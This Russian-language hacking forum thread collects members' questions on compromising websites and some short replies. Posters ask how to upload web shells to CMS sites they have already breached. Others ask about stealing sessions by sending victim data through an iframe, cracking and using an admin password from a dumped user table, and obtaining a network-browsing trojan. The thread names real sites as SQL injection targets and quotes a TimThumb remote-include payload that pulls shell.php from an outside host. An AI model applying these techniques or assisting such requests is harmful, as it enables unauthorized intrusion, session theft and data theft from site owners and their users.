[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    1. Можно ли залить шелл в джyмлy 1.7
    Jsky нашел следущее:
    2. Есть пассивка на почтовик, но не работает в ie и хроме.
    Есть ли варианты обмануть хотя бы ие?
     
    #361 jacklndn, 27 Feb 2012
    Last edited: 28 Feb 2012
  2. HoLoD

    HoLoD New Member

    Joined:
    5 May 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Спрошу еще тут:

    Есть доступ к админке сайта. CMS - "МегаГруп Система управления S3". Есть ли возможность туда залить шелл? Кто сталкивался?
     
  3. drBinokl

    drBinokl New Member

    Joined:
    22 Jul 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    скажите пожалуйста какой движок на этом сайте http://nanomix.biz/
     
  4. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    wordpress
     
  5. Evgentusc

    Evgentusc New Member

    Joined:
    20 Feb 2012
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Вопрос такой: как узнать хост на котором находится сайт? вот сам сайт: http://prof-spb.ru

    ЗЫ. Если ошибся темой, пожалуйста перенесите в нужную.
     
  6. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    2ip.ru
    "Узнать IP адрес сайта", ping prof-spb.ru выдаст ип.
    Но это мб не ип конкретно этого сайта, а сервера на котором не только он хоститься.
     
  7. TambWolf

    TambWolf New Member

    Joined:
    22 May 2009
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Дело такое, на одном сайте, если прописывать на одной страницы:
    www.sait.ru/stranita/asada
    www.sait.ru/stranita/22222

    Вылазеет текст:
    PHP:
                                 {'Connection',"close"},
                                  {
    'User-Agent',
                                   
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0"},
                                  {
    'Accept',
                                  {
    'Accept-Language',
                                   
    "ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3"},
                                  {
    'Accept-Encoding',"gzip, deflate"},
                                  {
    'Cookie',
                                   
    "XXXXXXXXXXXXXXXXXXXXXXXXXX"}],

    Сайт стоит на друпале, подскажите пожалуйста, что это за уязвимость и что можно из нее извлечь, в частности как лучше с помощью нее украсть сессию. Можно ли как-нибудь прописать запрос, который бы высылал мне все данные жертвы, ну и соответственно поместить его в ифрайме какого-нибудь html страницы.
     
  8. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    140
    Likes Received:
    13
    Reputations:
    0
    Есть сайт, с postnuke
    Спарсил через информашен_чема все таблицы.
    Нашел таблу с юзерами, разшифровал пасс вроде как админа.
    Но вот в чем но

    Где в postnuke админка?
    Кроме редактирования пользователя ничего больше найти не могу
    Или, если админские логи хранятся не в prefix_users, можно ли их в какой табле найти?
     
  9. darkness

    darkness New Member

    Joined:
    10 Jun 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    актуальны ли сейчас xss уязвимости?
    Я вот в комментарий вставил javascript код, он отобразился без фильтрации, но не выполнился. Это значит, что такого рода уязвимостей на сайте нет?
     
  10. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Это значит, наоборот, есть фильтрация, скорее сего htmlspecialchars...
    Актуальны как никогда)

    Сначала авторизуйся на странице user.php, потом ручками перейди на admin.php
     
  11. darkness

    darkness New Member

    Joined:
    10 Jun 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
     
  12. recfrf

    recfrf Member

    Joined:
    22 Aug 2008
    Messages:
    21
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://www.turkeyhomesales.com/index.php?option=com_estateagent&Itemid=49&act=object&task=showEO&id=1999
    есть скуль или нет?, не пойму
     
  13. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    нету.
     
  14. Outsync

    Outsync New Member

    Joined:
    12 Apr 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Доброго дня и с праздничком всех. Получил доступ к сайту на cms typo3, немогу найти каким образом влезть в шаблон для редактирования... Правка php файлов ничего не дает, там как-то нужно очищать кэш в админке после нововведений. help
     
  15. antiprisma

    antiprisma New Member

    Joined:
    14 Apr 2012
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Подскажите название трояна с возможностью просматривать локальную сеть win к которой подключен зараженный комп. Ну и ссылку если такой существует в паблике.
     
  16. klb

    klb Banned

    Joined:
    19 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Вопрос на зацепку

    доброго дня форумчани
    вот такой есть прикол
    site.com/index.php пашет нормик(отображаеться)
    site.com/index.php//////////////////(вагон слешей)
    всё рвёт и криво отображаеться можно както раскрутить?
    на нулл байт уже все перерыл не пашет
    мож кто знает подскажите плиз
     
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    А с чего ты взял, что там у тебя инлуд? И какая версия рнр, после обновления 5.3.4 (null байт) уже не работает!
     
  18. klb

    klb Banned

    Joined:
    19 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    5.2.11 пхп
    но раскрутить никак не могу
     
  19. promarketing

    promarketing New Member

    Joined:
    5 Aug 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    Word press TimThumb Уязвимость

    /wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

    Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

    Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
     
  20. Weil

    Weil New Member

    Joined:
    6 Jun 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Есть сайт на Drupal, с него недавно были удалены страницы(ранее существовали, теперь 404). Возможно ли создать(воссоздать) страницы с этими определенными именами? Скажем site/node/12345 - движек, я так понял, создает со случайным номером, а нужно именно с определенным!